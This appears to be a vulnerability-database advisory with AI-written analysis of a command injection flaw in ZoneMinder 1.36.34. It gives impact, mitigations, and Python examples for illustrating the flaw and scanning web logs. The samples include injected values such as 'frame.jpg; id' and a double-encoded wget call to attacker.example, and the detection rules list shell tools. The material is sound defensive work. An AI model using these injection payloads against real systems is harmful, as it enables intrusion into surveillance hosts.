CVE-2025-65791: n/a
ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.
AI Analysis
Technical Summary
CVE-2025-65791 is a critical OS command injection vulnerability reported in ZoneMinder 1.36.34, a widely used open-source video surveillance system. The flaw is in web/views/image.php, where a request-supplied value is passed into PHP's exec() without validation or shell escaping; it is classed as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Because exec() hands its argument to /bin/sh, shell metacharacters such as ; | && or $( ) in that value terminate the intended command and start an attacker-chosen one, which then runs with the privileges of the web server process (typically www-data on Debian/Ubuntu installs). The advisory names only 1.36.34 and does not say whether other releases share the code path, so treat neighbouring versions as unverified rather than safe. The assessment is that exploitation needs neither authentication nor user interaction and is reachable over the network, which is what a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) encodes; the page does not state whether ZoneMinder's built-in login (OPT_USE_AUTH) gates this view, so assume it is reachable without credentials until the vendor says otherwise. Full control of the host follows: reading live and archived video, altering or deleting recordings, or stopping monitoring entirely. No public exploit had been reported at the time of analysis, but command injection of this kind is trivial to weaponise once the parameter is known, and the software's role in physical security raises the stakes. The CVE was reserved on 2025-11-18 and published in February 2026; no official patch or vendor mitigation was available when this analysis was written.
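The mechanics described above, as an added illustration in Python that is not ZoneMinder's code: the page does not show which request parameter image.php interpolates or which program it runs, so the convert invocation, the filename parameter and the attacker value below are hypothetical stand-ins for the pattern. The block contrasts raw interpolation (the shape of the vulnerable exec() call) with shell quoting and with an allowlist plus argv list, and tokenises each command the way a POSIX shell would so the injected second command is visible without executing anything.

```python
"""Mechanics of the exec() command injection the advisory describes, modelled in Python.

Added example, not ZoneMinder's code: the 'convert' invocation and the filename
parameter are hypothetical stand-ins for whatever image.php actually builds.
"""
import re
import shlex

# Allowlist for a filename-like parameter: letters, digits, dot, dash, underscore.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")
# Tokens a POSIX shell treats as command separators.
SEPARATORS = {";", "|", "||", "&&", "&"}


def unsafe_command(filename: str) -> str:
    """The vulnerable shape: raw interpolation, as in PHP exec("convert $filename out.jpg")."""
    return f"convert {filename} out.jpg"


def quoted_command(filename: str) -> str:
    """Same command with the value shell-quoted; shlex.quote() plays the role of PHP's escapeshellarg()."""
    return f"convert {shlex.quote(filename)} out.jpg"


def validated_argv(filename: str) -> list:
    """Strongest form: allowlist the value, then hand an argv list to the OS with no shell
    in the loop (subprocess.run(argv) in Python; proc_open() with an array command in PHP 7.4+)."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return ["convert", filename, "out.jpg"]


def shell_words(cmd: str) -> list:
    """Split cmd the way a POSIX shell would, keeping ';', '|', '&&' as their own tokens."""
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))


def injected_commands(cmd: str) -> list:
    """Names of the extra programs a shell would run because of a separator inside cmd."""
    words = shell_words(cmd)
    return [words[i + 1] for i, w in enumerate(words) if w in SEPARATORS and i + 1 < len(words)]


if __name__ == "__main__":
    payload = "frame.jpg; id"  # constructed attacker value for the parameter
    print(injected_commands(unsafe_command(payload)))  # ['id']: a second command runs
    print(injected_commands(quoted_command(payload)))  # []: the value stays one argument
    print(validated_argv("frame-001.jpg"))            # ['convert', 'frame-001.jpg', 'out.jpg']
```

Quoting alone stops the separator from being parsed, but the allowlist is what keeps an unexpected value (a path traversal, a flag starting with -) out of the command in the first place; the usual PHP fix is both together, or dropping the shell by passing an argument array to proc_open().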
Potential Impact
For European organizations, the impact of this vulnerability is significant, especially for those relying on ZoneMinder for video surveillance in critical infrastructure, government facilities, transportation hubs, and private enterprises. Successful exploitation can lead to full system compromise, enabling attackers to access or manipulate surveillance footage, disable monitoring capabilities, or use the compromised system as a foothold for lateral movement within the network. This threatens physical security, data privacy, and operational continuity. Given the criticality of surveillance in sectors like public safety, energy, and transportation, disruption or compromise could have cascading effects on national security and public trust. Additionally, unauthorized access to video feeds may violate GDPR and other privacy regulations, exposing organizations to legal and financial penalties. The lack of authentication and user interaction requirements increases the likelihood of automated exploitation attempts, raising the urgency for European entities to address this vulnerability promptly.
Mitigation Recommendations
1. Restrict network access to the ZoneMinder web interface, and to the image view in particular, with firewalls or network segmentation so that only trusted users and management networks can reach it. Where the interface must stay reachable, put it behind a reverse proxy or VPN that authenticates before the request reaches ZoneMinder, and enable ZoneMinder's own login (OPT_USE_AUTH) if it is off.
2. Add web application firewall (WAF) rules that key on the HTTP request rather than on exec(), which a WAF never sees: block or alert on requests to the image view whose parameter values contain shell metacharacters (; | & ` $ ( ) < > or a newline) in raw, percent-encoded or double-encoded form.
3. If you build ZoneMinder from source or maintain a fork, patch image.php so every request value that reaches exec() is validated against an allowlist (a value expected to be numeric is rejected unless it matches ^[0-9]+$) and wrapped in escapeshellarg(); better still, avoid the shell entirely. Character blacklists are not a substitute.
4. Monitor web server access logs for the patterns in item 2, and host telemetry for the web server account spawning unexpected children (sh, bash, curl, wget, nc, python) or opening outbound connections; a successful injection typically appears as a new child of the apache2 or php-fpm process.
5. Run ZoneMinder on a dedicated host or container under a least-privilege service account with no sudo rights for the web server user and with outbound egress limited to what the cameras and storage need, so a compromised process cannot easily fetch tooling or pivot.
6. Track ZoneMinder's release notes and security advisories and apply the fix as soon as one is published; until then, item 1 is the only control that removes the exposure rather than reducing it.
7. Conduct regular security assessments and penetration tests focused on web application vulnerabilities to detect similar issues proactively.
8. Brief IT and security teams on this vulnerability and ensure incident response plans cover compromise of video surveillance systems.
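The log monitoring in item 4, as an added example rather than anything from ZoneMinder or the advisory: a Python scanner over combined-format access log lines that flags requests to the image view whose decoded parameter values contain shell metacharacters, including double-encoded ones. It assumes image.php is reached through index.php?view=image (ZoneMinder's usual view routing); the parameter names eid and fid, the client addresses and the log lines themselves are constructed for the demonstration.

```python
"""Flag requests to the ZoneMinder image view whose parameters carry shell metacharacters.

Added example for the monitoring step above, not ZoneMinder code. Assumptions: the web
server writes combined-format access logs, image.php is reached through
index.php?view=image, and the parameter names in the sample lines (eid, fid) are illustrative.
"""
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Request targets worth inspecting; extend for reverse-proxy prefixes in your deployment.
URL_MARKERS = ("view=image", "/views/image.php")
# Characters a POSIX shell treats specially; none of them belongs in an identifier value.
META = re.compile(r"[;|&`$<>\r\n]")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%253B -> %3B -> ;) are caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query: str) -> list:
    """Split a query string on '&' only; parse_qsl() in older Pythons also splits on ';',
    which would hide exactly the separator being hunted for."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def suspicious_params(target: str) -> list:
    """Return (name, decoded value) pairs from target that contain a shell metacharacter."""
    if not any(marker in target for marker in URL_MARKERS):
        return []
    _, _, query = target.partition("?")
    hits = []
    for name, value in parse_query(query):
        decoded = decode_fully(value)
        if META.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines) -> list:
    """Return one finding per suspicious parameter seen in the access log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, decoded in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "param": name, "value": decoded})
    return findings


# Constructed sample lines: a benign request, a raw ';' payload, a double-encoded '&&' payload,
# and an unrelated view that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Feb/2026:12:00:01 +0000] "GET /zm/index.php?view=image&eid=42&fid=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Feb/2026:12:00:02 +0000] "GET /zm/index.php?view=image&eid=42&fid=7%3Bid HTTP/1.1" 500 312 "-" "curl/8.4.0"',
    '198.51.100.9 - - [19/Feb/2026:12:00:03 +0000] "GET /zm/index.php?view=image&eid=42&fid=7%2526%2526wget%2520http%3A%2F%2Fattacker.example%2Fa HTTP/1.1" 200 128 "-" "python-requests/2.31"',
    '198.51.100.9 - - [19/Feb/2026:12:00:04 +0000] "GET /zm/index.php?view=montage HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r} status={f['status']}")
```

A 500 on a flagged request is not proof of failure: exec() output handling often errors after the injected command has already run, so every hit deserves a look at process-creation telemetry for the web server user around that timestamp.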
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Belgium, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-11-18T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 6996fb4b8fb9188dea8c0df6
Added to database: 2/19/2026, 12:00:11 PM
Last enriched: 2/19/2026, 12:11:13 PM
Last updated: 2/21/2026, 12:16:09 AM